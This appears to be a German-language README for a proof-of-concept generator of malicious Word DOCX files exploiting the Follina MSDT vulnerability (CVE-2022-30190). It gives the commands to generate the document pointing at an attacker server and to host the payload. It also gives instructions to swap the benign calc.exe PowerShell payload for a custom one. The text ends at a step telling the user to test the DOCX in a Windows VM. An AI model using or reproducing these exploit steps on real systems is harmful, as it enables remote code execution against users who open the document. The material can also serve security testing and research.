
MS-MSDT Follina CVE-2022-30190 PoC-Dokumentgenerator
Bösartiger DOCX-Generator zur Ausnutzung (Microsoft Office Word Remotecodeausführung)
Die Erstellung dieses Skripts basiert auf CVE-2021-40444 PoC von LockedByte und Beitrag von Tothi
Zuerst backup.html bearbeiten und das PowerShell-Payload ersetzen. Im Moment startet es nur einen calc.exe-Prozess mittels IEX('calc.exe').
python3 exploit.py generate http://<SRV IP>

Sobald Sie das bösartige DOCX erstellt haben (es befindet sich in out/) können Sie den Server einrichten:
sudo python3 exploit.py host 80

Testen Sie das DOCX abschließend in einer Windows-VM:
